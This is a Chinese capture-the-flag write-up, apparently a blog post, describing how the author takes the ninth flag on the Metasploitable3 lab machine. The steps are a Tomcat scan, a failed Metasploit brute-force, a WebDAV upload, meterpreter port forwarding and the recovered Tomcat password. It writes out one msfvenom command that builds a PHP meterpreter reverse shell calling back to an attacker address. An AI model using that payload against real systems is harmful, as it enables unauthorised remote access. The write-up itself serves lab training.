Metasploitable3-Jack of Clubs 第九个flag

 

这是第九个flag.
首先从nmap扫描中我们可以得出以下信息
8282/tcp open http Apache Tomcat/Coyote JSP engine 1.1
http-favicon: Apache Tomcat
http-server-header: Apache-Coyote/1.1
http-title: Apache Tomcat/8.0.33

Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为目前比较流行的Web 应用服务器。

因为它对应http服务,所以先用浏览器访问一下


看见manager app,点一下,弹出一个窗口让你输入用户名和密码,这让我很容易地就联想到爆破

爆破可以用burpsuite,也可以用msf里面对应的tomcat模块
我这里就用msf爆破
search tomcat

设置相关参数

爆破,可惜没能成功,我尝试从别的地方出发

我记得前面8585的端口那里有个上传目录,我准备从那里下手,

先生成一个webshell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=4444 -f raw>davtest.php

用cadaver上传上去并运行,拿到shell

现在马上去tomcat的目录查看相关密码

没有权限,
meterpreter里面自带有一个portfwd命令,它的功能是端口转发

设置好相关参数
成功连接

现在去找tomcat密码

得到相关密码为sploit

直接找flag把

双击打开
另外我找到flag的路径
C:\vagrant\resources\flags
在meterpreter上把它们全部下载下来
这一次要把它们一锅端了

先看看jack_of_club

直接是png大功告成了,本篇就完结吧,剩下的那些我在下篇说。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值